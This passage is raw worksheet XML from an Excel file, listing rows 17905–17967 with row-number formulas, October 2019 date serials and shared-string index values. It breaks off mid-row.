    <row r="17905" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17905">
        <f t="shared" si="279"/>
        <v>17904</v>
      </c>
      <c r="B17905">
        <v>2904</v>
      </c>
      <c r="C17905" t="s">
        <v>25497</v>
      </c>
      <c r="D17905" s="1">
        <v>43748</v>
      </c>
      <c r="E17905" t="s">
        <v>26257</v>
      </c>
      <c r="F17905" t="s">
        <v>9975</v>
      </c>
      <c r="G17905" t="s">
        <v>29248</v>
      </c>
    </row>
    <row r="17906" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17906">
        <f t="shared" si="279"/>
        <v>17905</v>
      </c>
      <c r="B17906">
        <v>2905</v>
      </c>
      <c r="C17906" t="s">
        <v>25497</v>
      </c>
      <c r="D17906" s="1">
        <v>43749</v>
      </c>
      <c r="E17906" t="s">
        <v>25512</v>
      </c>
      <c r="F17906" t="s">
        <v>9975</v>
      </c>
      <c r="G17906" t="s">
        <v>29249</v>
      </c>
    </row>
    <row r="17907" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17907">
        <f t="shared" si="279"/>
        <v>17906</v>
      </c>
      <c r="B17907">
        <v>2906</v>
      </c>
      <c r="C17907" t="s">
        <v>25497</v>
      </c>
      <c r="D17907" s="1">
        <v>43755</v>
      </c>
      <c r="E17907" t="s">
        <v>29250</v>
      </c>
      <c r="F17907" t="s">
        <v>9975</v>
      </c>
      <c r="G17907" t="s">
        <v>29251</v>
      </c>
    </row>
    <row r="17908" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17908">
        <f t="shared" si="279"/>
        <v>17907</v>
      </c>
      <c r="B17908">
        <v>2907</v>
      </c>
      <c r="C17908" t="s">
        <v>25497</v>
      </c>
      <c r="D17908" s="1">
        <v>43749</v>
      </c>
      <c r="F17908" t="s">
        <v>9975</v>
      </c>
      <c r="G17908" t="s">
        <v>29252</v>
      </c>
    </row>
    <row r="17909" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17909">
        <f t="shared" si="279"/>
        <v>17908</v>
      </c>
      <c r="B17909">
        <v>2908</v>
      </c>
      <c r="C17909" t="s">
        <v>25497</v>
      </c>
      <c r="D17909" s="1">
        <v>43742</v>
      </c>
      <c r="E17909" t="s">
        <v>28087</v>
      </c>
      <c r="F17909" t="s">
        <v>9975</v>
      </c>
      <c r="G17909" t="s">
        <v>29253</v>
      </c>
    </row>
    <row r="17910" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17910">
        <f t="shared" si="279"/>
        <v>17909</v>
      </c>
      <c r="B17910">
        <v>2909</v>
      </c>
      <c r="C17910" t="s">
        <v>25497</v>
      </c>
      <c r="D17910" s="1">
        <v>43748</v>
      </c>
      <c r="E17910" t="s">
        <v>29254</v>
      </c>
      <c r="F17910" t="s">
        <v>9975</v>
      </c>
      <c r="G17910" t="s">
        <v>29255</v>
      </c>
    </row>
    <row r="17911" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17911">
        <f t="shared" si="279"/>
        <v>17910</v>
      </c>
      <c r="B17911">
        <v>2910</v>
      </c>
      <c r="C17911" t="s">
        <v>25497</v>
      </c>
      <c r="D17911" s="1">
        <v>43748</v>
      </c>
      <c r="F17911" t="s">
        <v>9975</v>
      </c>
      <c r="G17911" t="s">
        <v>29256</v>
      </c>
    </row>
    <row r="17912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17912">
        <f t="shared" si="279"/>
        <v>17911</v>
      </c>
      <c r="B17912">
        <v>2911</v>
      </c>
      <c r="C17912" t="s">
        <v>25497</v>
      </c>
      <c r="D17912" s="1">
        <v>43739</v>
      </c>
      <c r="F17912" t="s">
        <v>9975</v>
      </c>
      <c r="G17912" t="s">
        <v>29257</v>
      </c>
    </row>
    <row r="17913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17913">
        <f t="shared" si="279"/>
        <v>17912</v>
      </c>
      <c r="B17913">
        <v>2912</v>
      </c>
      <c r="C17913" t="s">
        <v>25497</v>
      </c>
      <c r="D17913" s="1">
        <v>43748</v>
      </c>
      <c r="E17913" t="s">
        <v>29258</v>
      </c>
      <c r="F17913" t="s">
        <v>9975</v>
      </c>
      <c r="G17913" t="s">
        <v>29259</v>
      </c>
    </row>
    <row r="17914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17914">
        <f t="shared" si="279"/>
        <v>17913</v>
      </c>
      <c r="B17914">
        <v>2913</v>
      </c>
      <c r="C17914" t="s">
        <v>25497</v>
      </c>
      <c r="D17914" s="1">
        <v>43742</v>
      </c>
      <c r="E17914" t="s">
        <v>25517</v>
      </c>
      <c r="F17914" t="s">
        <v>9975</v>
      </c>
      <c r="G17914" t="s">
        <v>29260</v>
      </c>
    </row>
    <row r="17915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17915">
        <f t="shared" si="279"/>
        <v>17914</v>
      </c>
      <c r="B17915">
        <v>2914</v>
      </c>
      <c r="C17915" t="s">
        <v>25497</v>
      </c>
      <c r="D17915" s="1">
        <v>43747</v>
      </c>
      <c r="E17915" t="s">
        <v>29261</v>
      </c>
      <c r="F17915" t="s">
        <v>10526</v>
      </c>
      <c r="G17915" t="s">
        <v>29262</v>
      </c>
    </row>
    <row r="17916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17916">
        <f t="shared" si="279"/>
        <v>17915</v>
      </c>
      <c r="B17916">
        <v>2915</v>
      </c>
      <c r="C17916" t="s">
        <v>25497</v>
      </c>
      <c r="D17916" s="1">
        <v>43745</v>
      </c>
      <c r="F17916" t="s">
        <v>9975</v>
      </c>
      <c r="G17916" t="s">
        <v>29263</v>
      </c>
    </row>
    <row r="17917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17917">
        <f t="shared" si="279"/>
        <v>17916</v>
      </c>
      <c r="B17917">
        <v>2916</v>
      </c>
      <c r="C17917" t="s">
        <v>25497</v>
      </c>
      <c r="D17917" s="1">
        <v>43747</v>
      </c>
      <c r="E17917" t="s">
        <v>25517</v>
      </c>
      <c r="F17917" t="s">
        <v>9975</v>
      </c>
      <c r="G17917" t="s">
        <v>29264</v>
      </c>
    </row>
    <row r="17918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17918">
        <f t="shared" si="279"/>
        <v>17917</v>
      </c>
      <c r="B17918">
        <v>2917</v>
      </c>
      <c r="C17918" t="s">
        <v>25497</v>
      </c>
      <c r="D17918" s="1">
        <v>43753</v>
      </c>
      <c r="E17918" t="s">
        <v>29265</v>
      </c>
      <c r="F17918" t="s">
        <v>9975</v>
      </c>
      <c r="G17918" t="s">
        <v>29266</v>
      </c>
    </row>
    <row r="17919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17919">
        <f t="shared" si="279"/>
        <v>17918</v>
      </c>
      <c r="B17919">
        <v>2918</v>
      </c>
      <c r="C17919" t="s">
        <v>25497</v>
      </c>
      <c r="D17919" s="1">
        <v>43757</v>
      </c>
      <c r="E17919" t="s">
        <v>27294</v>
      </c>
      <c r="F17919" t="s">
        <v>9975</v>
      </c>
      <c r="G17919" t="s">
        <v>29267</v>
      </c>
    </row>
    <row r="17920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17920">
        <f t="shared" si="279"/>
        <v>17919</v>
      </c>
      <c r="B17920">
        <v>2919</v>
      </c>
      <c r="C17920" t="s">
        <v>25497</v>
      </c>
      <c r="D17920" s="1">
        <v>43757</v>
      </c>
      <c r="F17920" t="s">
        <v>9975</v>
      </c>
      <c r="G17920" t="s">
        <v>29268</v>
      </c>
    </row>
    <row r="17921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17921">
        <f t="shared" si="279"/>
        <v>17920</v>
      </c>
      <c r="B17921">
        <v>2920</v>
      </c>
      <c r="C17921" t="s">
        <v>25497</v>
      </c>
      <c r="D17921" s="1">
        <v>43752</v>
      </c>
      <c r="E17921" t="s">
        <v>25517</v>
      </c>
      <c r="F17921" t="s">
        <v>9975</v>
      </c>
      <c r="G17921" t="s">
        <v>29269</v>
      </c>
    </row>
    <row r="17922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17922">
        <f t="shared" si="279"/>
        <v>17921</v>
      </c>
      <c r="B17922">
        <v>2921</v>
      </c>
      <c r="C17922" t="s">
        <v>25497</v>
      </c>
      <c r="D17922" s="1">
        <v>43740</v>
      </c>
      <c r="E17922" t="s">
        <v>25512</v>
      </c>
      <c r="F17922" t="s">
        <v>9975</v>
      </c>
      <c r="G17922" t="s">
        <v>29270</v>
      </c>
    </row>
    <row r="17923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17923">
        <f t="shared" ref="A17923:A17986" si="280">+ROW(A17922)</f>
        <v>17922</v>
      </c>
      <c r="B17923">
        <v>2922</v>
      </c>
      <c r="C17923" t="s">
        <v>25497</v>
      </c>
      <c r="D17923" s="1">
        <v>43740</v>
      </c>
      <c r="E17923" t="s">
        <v>29271</v>
      </c>
      <c r="F17923" t="s">
        <v>9975</v>
      </c>
      <c r="G17923" t="s">
        <v>29272</v>
      </c>
    </row>
    <row r="17924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17924">
        <f t="shared" si="280"/>
        <v>17923</v>
      </c>
      <c r="B17924">
        <v>2923</v>
      </c>
      <c r="C17924" t="s">
        <v>25497</v>
      </c>
      <c r="D17924" s="1">
        <v>43740</v>
      </c>
      <c r="E17924" t="s">
        <v>25592</v>
      </c>
      <c r="F17924" t="s">
        <v>9975</v>
      </c>
      <c r="G17924" t="s">
        <v>29273</v>
      </c>
    </row>
    <row r="17925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17925">
        <f t="shared" si="280"/>
        <v>17924</v>
      </c>
      <c r="B17925">
        <v>2924</v>
      </c>
      <c r="C17925" t="s">
        <v>25497</v>
      </c>
      <c r="D17925" s="1">
        <v>43746</v>
      </c>
      <c r="F17925" t="s">
        <v>9975</v>
      </c>
      <c r="G17925" t="s">
        <v>29274</v>
      </c>
    </row>
    <row r="17926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17926">
        <f t="shared" si="280"/>
        <v>17925</v>
      </c>
      <c r="B17926">
        <v>2925</v>
      </c>
      <c r="C17926" t="s">
        <v>25497</v>
      </c>
      <c r="D17926" s="1">
        <v>43748</v>
      </c>
      <c r="F17926" t="s">
        <v>9975</v>
      </c>
      <c r="G17926" t="s">
        <v>29275</v>
      </c>
    </row>
    <row r="17927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17927">
        <f t="shared" si="280"/>
        <v>17926</v>
      </c>
      <c r="B17927">
        <v>2926</v>
      </c>
      <c r="C17927" t="s">
        <v>25497</v>
      </c>
      <c r="D17927" s="1">
        <v>43739</v>
      </c>
      <c r="E17927" t="s">
        <v>29276</v>
      </c>
      <c r="F17927" t="s">
        <v>9975</v>
      </c>
      <c r="G17927" t="s">
        <v>29277</v>
      </c>
    </row>
    <row r="17928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17928">
        <f t="shared" si="280"/>
        <v>17927</v>
      </c>
      <c r="B17928">
        <v>2927</v>
      </c>
      <c r="C17928" t="s">
        <v>25497</v>
      </c>
      <c r="D17928" s="1">
        <v>43752</v>
      </c>
      <c r="E17928" t="s">
        <v>25592</v>
      </c>
      <c r="F17928" t="s">
        <v>9975</v>
      </c>
      <c r="G17928" t="s">
        <v>29278</v>
      </c>
    </row>
    <row r="17929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17929">
        <f t="shared" si="280"/>
        <v>17928</v>
      </c>
      <c r="B17929">
        <v>2928</v>
      </c>
      <c r="C17929" t="s">
        <v>25497</v>
      </c>
      <c r="D17929" s="1">
        <v>43745</v>
      </c>
      <c r="E17929" t="s">
        <v>29279</v>
      </c>
      <c r="F17929" t="s">
        <v>10021</v>
      </c>
      <c r="G17929" t="s">
        <v>29280</v>
      </c>
    </row>
    <row r="17930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17930">
        <f t="shared" si="280"/>
        <v>17929</v>
      </c>
      <c r="B17930">
        <v>2929</v>
      </c>
      <c r="C17930" t="s">
        <v>25497</v>
      </c>
      <c r="D17930" s="1">
        <v>43752</v>
      </c>
      <c r="E17930" t="s">
        <v>29281</v>
      </c>
      <c r="F17930" t="s">
        <v>9975</v>
      </c>
      <c r="G17930" t="s">
        <v>29282</v>
      </c>
    </row>
    <row r="17931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17931">
        <f t="shared" si="280"/>
        <v>17930</v>
      </c>
      <c r="B17931">
        <v>2930</v>
      </c>
      <c r="C17931" t="s">
        <v>25497</v>
      </c>
      <c r="D17931" s="1">
        <v>43755</v>
      </c>
      <c r="E17931" t="s">
        <v>25512</v>
      </c>
      <c r="F17931" t="s">
        <v>9975</v>
      </c>
      <c r="G17931" t="s">
        <v>29283</v>
      </c>
    </row>
    <row r="17932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17932">
        <f t="shared" si="280"/>
        <v>17931</v>
      </c>
      <c r="B17932">
        <v>2931</v>
      </c>
      <c r="C17932" t="s">
        <v>25497</v>
      </c>
      <c r="D17932" s="1">
        <v>43753</v>
      </c>
      <c r="E17932" t="s">
        <v>25512</v>
      </c>
      <c r="F17932" t="s">
        <v>9975</v>
      </c>
      <c r="G17932" t="s">
        <v>29284</v>
      </c>
    </row>
    <row r="17933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17933">
        <f t="shared" si="280"/>
        <v>17932</v>
      </c>
      <c r="B17933">
        <v>2932</v>
      </c>
      <c r="C17933" t="s">
        <v>25497</v>
      </c>
      <c r="D17933" s="1">
        <v>43741</v>
      </c>
      <c r="F17933" t="s">
        <v>9975</v>
      </c>
      <c r="G17933" t="s">
        <v>29285</v>
      </c>
    </row>
    <row r="17934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17934">
        <f t="shared" si="280"/>
        <v>17933</v>
      </c>
      <c r="B17934">
        <v>2933</v>
      </c>
      <c r="C17934" t="s">
        <v>25497</v>
      </c>
      <c r="D17934" s="1">
        <v>43747</v>
      </c>
      <c r="F17934" t="s">
        <v>9975</v>
      </c>
      <c r="G17934" t="s">
        <v>29286</v>
      </c>
    </row>
    <row r="17935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17935">
        <f t="shared" si="280"/>
        <v>17934</v>
      </c>
      <c r="B17935">
        <v>2934</v>
      </c>
      <c r="C17935" t="s">
        <v>25497</v>
      </c>
      <c r="D17935" s="1">
        <v>43754</v>
      </c>
      <c r="E17935" t="s">
        <v>25890</v>
      </c>
      <c r="F17935" t="s">
        <v>9975</v>
      </c>
      <c r="G17935" t="s">
        <v>29287</v>
      </c>
    </row>
    <row r="17936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17936">
        <f t="shared" si="280"/>
        <v>17935</v>
      </c>
      <c r="B17936">
        <v>2935</v>
      </c>
      <c r="C17936" t="s">
        <v>25497</v>
      </c>
      <c r="D17936" s="1">
        <v>43745</v>
      </c>
      <c r="F17936" t="s">
        <v>9975</v>
      </c>
      <c r="G17936" t="s">
        <v>29288</v>
      </c>
    </row>
    <row r="17937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17937">
        <f t="shared" si="280"/>
        <v>17936</v>
      </c>
      <c r="B17937">
        <v>2936</v>
      </c>
      <c r="C17937" t="s">
        <v>25497</v>
      </c>
      <c r="D17937" s="1">
        <v>43741</v>
      </c>
      <c r="E17937" t="s">
        <v>29289</v>
      </c>
      <c r="F17937" t="s">
        <v>9975</v>
      </c>
      <c r="G17937" t="s">
        <v>29290</v>
      </c>
    </row>
    <row r="17938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17938">
        <f t="shared" si="280"/>
        <v>17937</v>
      </c>
      <c r="B17938">
        <v>2937</v>
      </c>
      <c r="C17938" t="s">
        <v>25497</v>
      </c>
      <c r="D17938" s="1">
        <v>43748</v>
      </c>
      <c r="E17938" t="s">
        <v>21279</v>
      </c>
      <c r="F17938" t="s">
        <v>10526</v>
      </c>
      <c r="G17938" t="s">
        <v>29291</v>
      </c>
    </row>
    <row r="17939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17939">
        <f t="shared" si="280"/>
        <v>17938</v>
      </c>
      <c r="B17939">
        <v>2938</v>
      </c>
      <c r="C17939" t="s">
        <v>25497</v>
      </c>
      <c r="D17939" s="1">
        <v>43748</v>
      </c>
      <c r="E17939" t="s">
        <v>29292</v>
      </c>
      <c r="F17939" t="s">
        <v>9975</v>
      </c>
      <c r="G17939" t="s">
        <v>29293</v>
      </c>
    </row>
    <row r="17940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17940">
        <f t="shared" si="280"/>
        <v>17939</v>
      </c>
      <c r="B17940">
        <v>2939</v>
      </c>
      <c r="C17940" t="s">
        <v>25497</v>
      </c>
      <c r="D17940" s="1">
        <v>43754</v>
      </c>
      <c r="E17940" t="s">
        <v>25502</v>
      </c>
      <c r="F17940" t="s">
        <v>9975</v>
      </c>
      <c r="G17940" t="s">
        <v>29294</v>
      </c>
    </row>
    <row r="17941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17941">
        <f t="shared" si="280"/>
        <v>17940</v>
      </c>
      <c r="B17941">
        <v>2940</v>
      </c>
      <c r="C17941" t="s">
        <v>25497</v>
      </c>
      <c r="D17941" s="1">
        <v>43752</v>
      </c>
      <c r="E17941" t="s">
        <v>29295</v>
      </c>
      <c r="F17941" t="s">
        <v>9975</v>
      </c>
      <c r="G17941" t="s">
        <v>29296</v>
      </c>
    </row>
    <row r="17942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17942">
        <f t="shared" si="280"/>
        <v>17941</v>
      </c>
      <c r="B17942">
        <v>2941</v>
      </c>
      <c r="C17942" t="s">
        <v>25497</v>
      </c>
      <c r="D17942" s="1">
        <v>43751</v>
      </c>
      <c r="E17942" t="s">
        <v>29297</v>
      </c>
      <c r="F17942" t="s">
        <v>9975</v>
      </c>
      <c r="G17942" t="s">
        <v>29298</v>
      </c>
    </row>
    <row r="17943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17943">
        <f t="shared" si="280"/>
        <v>17942</v>
      </c>
      <c r="B17943">
        <v>2942</v>
      </c>
      <c r="C17943" t="s">
        <v>25497</v>
      </c>
      <c r="D17943" s="1">
        <v>43741</v>
      </c>
      <c r="E17943" t="s">
        <v>29299</v>
      </c>
      <c r="F17943" t="s">
        <v>9975</v>
      </c>
      <c r="G17943" t="s">
        <v>29300</v>
      </c>
    </row>
    <row r="17944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17944">
        <f t="shared" si="280"/>
        <v>17943</v>
      </c>
      <c r="B17944">
        <v>2943</v>
      </c>
      <c r="C17944" t="s">
        <v>25497</v>
      </c>
      <c r="D17944" s="1">
        <v>43748</v>
      </c>
      <c r="E17944" t="s">
        <v>29301</v>
      </c>
      <c r="F17944" t="s">
        <v>10526</v>
      </c>
      <c r="G17944" t="s">
        <v>29302</v>
      </c>
    </row>
    <row r="17945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17945">
        <f t="shared" si="280"/>
        <v>17944</v>
      </c>
      <c r="B17945">
        <v>2944</v>
      </c>
      <c r="C17945" t="s">
        <v>25497</v>
      </c>
      <c r="D17945" s="1">
        <v>43741</v>
      </c>
      <c r="E17945" t="s">
        <v>29303</v>
      </c>
      <c r="F17945" t="s">
        <v>10021</v>
      </c>
      <c r="G17945" t="s">
        <v>29304</v>
      </c>
    </row>
    <row r="17946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17946">
        <f t="shared" si="280"/>
        <v>17945</v>
      </c>
      <c r="B17946">
        <v>2945</v>
      </c>
      <c r="C17946" t="s">
        <v>25497</v>
      </c>
      <c r="D17946" s="1">
        <v>43740</v>
      </c>
      <c r="E17946" t="s">
        <v>25942</v>
      </c>
      <c r="F17946" t="s">
        <v>9975</v>
      </c>
      <c r="G17946" t="s">
        <v>29305</v>
      </c>
    </row>
    <row r="17947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17947">
        <f t="shared" si="280"/>
        <v>17946</v>
      </c>
      <c r="B17947">
        <v>2946</v>
      </c>
      <c r="C17947" t="s">
        <v>25497</v>
      </c>
      <c r="D17947" s="1">
        <v>43755</v>
      </c>
      <c r="F17947" t="s">
        <v>9975</v>
      </c>
      <c r="G17947" t="s">
        <v>29306</v>
      </c>
    </row>
    <row r="17948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17948">
        <f t="shared" si="280"/>
        <v>17947</v>
      </c>
      <c r="B17948">
        <v>2947</v>
      </c>
      <c r="C17948" t="s">
        <v>25497</v>
      </c>
      <c r="D17948" s="1">
        <v>43745</v>
      </c>
      <c r="E17948" t="s">
        <v>29307</v>
      </c>
      <c r="F17948" t="s">
        <v>9975</v>
      </c>
      <c r="G17948" t="s">
        <v>29308</v>
      </c>
    </row>
    <row r="17949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17949">
        <f t="shared" si="280"/>
        <v>17948</v>
      </c>
      <c r="B17949">
        <v>2948</v>
      </c>
      <c r="C17949" t="s">
        <v>25497</v>
      </c>
      <c r="D17949" s="1">
        <v>43746</v>
      </c>
      <c r="F17949" t="s">
        <v>9975</v>
      </c>
      <c r="G17949" t="s">
        <v>29309</v>
      </c>
    </row>
    <row r="17950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17950">
        <f t="shared" si="280"/>
        <v>17949</v>
      </c>
      <c r="B17950">
        <v>2949</v>
      </c>
      <c r="C17950" t="s">
        <v>25497</v>
      </c>
      <c r="D17950" s="1">
        <v>43747</v>
      </c>
      <c r="E17950" t="s">
        <v>25517</v>
      </c>
      <c r="F17950" t="s">
        <v>9975</v>
      </c>
      <c r="G17950" t="s">
        <v>29310</v>
      </c>
    </row>
    <row r="17951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17951">
        <f t="shared" si="280"/>
        <v>17950</v>
      </c>
      <c r="B17951">
        <v>2950</v>
      </c>
      <c r="C17951" t="s">
        <v>25497</v>
      </c>
      <c r="D17951" s="1">
        <v>43739</v>
      </c>
      <c r="E17951" t="s">
        <v>25592</v>
      </c>
      <c r="F17951" t="s">
        <v>9975</v>
      </c>
      <c r="G17951" t="s">
        <v>29311</v>
      </c>
    </row>
    <row r="17952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17952">
        <f t="shared" si="280"/>
        <v>17951</v>
      </c>
      <c r="B17952">
        <v>2951</v>
      </c>
      <c r="C17952" t="s">
        <v>25497</v>
      </c>
      <c r="D17952" s="1">
        <v>43754</v>
      </c>
      <c r="E17952" t="s">
        <v>25517</v>
      </c>
      <c r="F17952" t="s">
        <v>9975</v>
      </c>
      <c r="G17952" t="s">
        <v>29312</v>
      </c>
    </row>
    <row r="17953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17953">
        <f t="shared" si="280"/>
        <v>17952</v>
      </c>
      <c r="B17953">
        <v>2952</v>
      </c>
      <c r="C17953" t="s">
        <v>25497</v>
      </c>
      <c r="D17953" s="1">
        <v>43750</v>
      </c>
      <c r="F17953" t="s">
        <v>9975</v>
      </c>
      <c r="G17953" t="s">
        <v>29313</v>
      </c>
    </row>
    <row r="17954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17954">
        <f t="shared" si="280"/>
        <v>17953</v>
      </c>
      <c r="B17954">
        <v>2953</v>
      </c>
      <c r="C17954" t="s">
        <v>25497</v>
      </c>
      <c r="D17954" s="1">
        <v>43742</v>
      </c>
      <c r="F17954" t="s">
        <v>9975</v>
      </c>
      <c r="G17954" t="s">
        <v>29314</v>
      </c>
    </row>
    <row r="17955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17955">
        <f t="shared" si="280"/>
        <v>17954</v>
      </c>
      <c r="B17955">
        <v>2954</v>
      </c>
      <c r="C17955" t="s">
        <v>25497</v>
      </c>
      <c r="D17955" s="1">
        <v>43748</v>
      </c>
      <c r="F17955" t="s">
        <v>9975</v>
      </c>
      <c r="G17955" t="s">
        <v>29315</v>
      </c>
    </row>
    <row r="17956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17956">
        <f t="shared" si="280"/>
        <v>17955</v>
      </c>
      <c r="B17956">
        <v>2955</v>
      </c>
      <c r="C17956" t="s">
        <v>25497</v>
      </c>
      <c r="D17956" s="1">
        <v>43749</v>
      </c>
      <c r="E17956" t="s">
        <v>25642</v>
      </c>
      <c r="F17956" t="s">
        <v>9975</v>
      </c>
      <c r="G17956" t="s">
        <v>29316</v>
      </c>
    </row>
    <row r="17957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17957">
        <f t="shared" si="280"/>
        <v>17956</v>
      </c>
      <c r="B17957">
        <v>2956</v>
      </c>
      <c r="C17957" t="s">
        <v>25497</v>
      </c>
      <c r="D17957" s="1">
        <v>43741</v>
      </c>
      <c r="F17957" t="s">
        <v>10526</v>
      </c>
      <c r="G17957" t="s">
        <v>29317</v>
      </c>
    </row>
    <row r="17958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17958">
        <f t="shared" si="280"/>
        <v>17957</v>
      </c>
      <c r="B17958">
        <v>2957</v>
      </c>
      <c r="C17958" t="s">
        <v>25497</v>
      </c>
      <c r="D17958" s="1">
        <v>43756</v>
      </c>
      <c r="F17958" t="s">
        <v>9978</v>
      </c>
      <c r="G17958" t="s">
        <v>29318</v>
      </c>
    </row>
    <row r="17959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17959">
        <f t="shared" si="280"/>
        <v>17958</v>
      </c>
      <c r="B17959">
        <v>2958</v>
      </c>
      <c r="C17959" t="s">
        <v>25497</v>
      </c>
      <c r="D17959" s="1">
        <v>43750</v>
      </c>
      <c r="E17959" t="s">
        <v>29319</v>
      </c>
      <c r="F17959" t="s">
        <v>9975</v>
      </c>
      <c r="G17959" t="s">
        <v>29320</v>
      </c>
    </row>
    <row r="17960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17960">
        <f t="shared" si="280"/>
        <v>17959</v>
      </c>
      <c r="B17960">
        <v>2959</v>
      </c>
      <c r="C17960" t="s">
        <v>25497</v>
      </c>
      <c r="D17960" s="1">
        <v>43755</v>
      </c>
      <c r="E17960" t="s">
        <v>25592</v>
      </c>
      <c r="F17960" t="s">
        <v>9975</v>
      </c>
      <c r="G17960" t="s">
        <v>29321</v>
      </c>
    </row>
    <row r="17961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17961">
        <f t="shared" si="280"/>
        <v>17960</v>
      </c>
      <c r="B17961">
        <v>2960</v>
      </c>
      <c r="C17961" t="s">
        <v>25497</v>
      </c>
      <c r="D17961" s="1">
        <v>43746</v>
      </c>
      <c r="E17961" t="s">
        <v>29322</v>
      </c>
      <c r="F17961" t="s">
        <v>9975</v>
      </c>
      <c r="G17961" t="s">
        <v>29323</v>
      </c>
    </row>
    <row r="17962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17962">
        <f t="shared" si="280"/>
        <v>17961</v>
      </c>
      <c r="B17962">
        <v>2961</v>
      </c>
      <c r="C17962" t="s">
        <v>25497</v>
      </c>
      <c r="D17962" s="1">
        <v>43741</v>
      </c>
      <c r="F17962" t="s">
        <v>9975</v>
      </c>
      <c r="G17962" t="s">
        <v>29324</v>
      </c>
    </row>
    <row r="17963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17963">
        <f t="shared" si="280"/>
        <v>17962</v>
      </c>
      <c r="B17963">
        <v>2962</v>
      </c>
      <c r="C17963" t="s">
        <v>25497</v>
      </c>
      <c r="D17963" s="1">
        <v>43755</v>
      </c>
      <c r="F17963" t="s">
        <v>9975</v>
      </c>
      <c r="G17963" t="s">
        <v>29325</v>
      </c>
    </row>
    <row r="17964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17964">
        <f t="shared" si="280"/>
        <v>17963</v>
      </c>
      <c r="B17964">
        <v>2963</v>
      </c>
      <c r="C17964" t="s">
        <v>25497</v>
      </c>
      <c r="D17964" s="1">
        <v>43744</v>
      </c>
      <c r="E17964" t="s">
        <v>29326</v>
      </c>
      <c r="F17964" t="s">
        <v>9975</v>
      </c>
      <c r="G17964" t="s">
        <v>29327</v>
      </c>
    </row>
    <row r="17965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17965">
        <f t="shared" si="280"/>
        <v>17964</v>
      </c>
      <c r="B17965">
        <v>2964</v>
      </c>
      <c r="C17965" t="s">
        <v>25497</v>
      </c>
      <c r="D17965" s="1">
        <v>43755</v>
      </c>
      <c r="E17965" t="s">
        <v>29328</v>
      </c>
      <c r="F17965" t="s">
        <v>9975</v>
      </c>
      <c r="G17965" t="s">
        <v>29329</v>
      </c>
    </row>
    <row r="17966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17966">
        <f t="shared" si="280"/>
        <v>17965</v>
      </c>
      <c r="B17966">
        <v>2965</v>
      </c>
      <c r="C17966" t="s">
        <v>25497</v>
      </c>
      <c r="D17966" s="1">
        <v>43740</v>
      </c>
      <c r="E17966" t="s">
        <v>25592</v>
      </c>
      <c r="F17966" t="s">
        <v>9975</v>
      </c>
      <c r="G17966" t="s">
        <v>29330</v>
      </c>
    </row>
    <row r="17967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17967">
        <f t="shared" si="280"/>
        <v>17966</v>
      </c>
      <c r="B17967">
        <v>2966</v>
      </c>
      <c r="C17967" t="s">
        <v>25497</v>
      </c>
      <c r="D17967" s="1">
        <v>43754</v>
      </c>
      <c r="F17967" t="s">
        <v>9975</v>
      </c>
      <c r="G17967" t="s">
        <v>29331</v>
      </c>
    </row>
    <row r="17968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17968">
        <f t="shared" si="280"/>
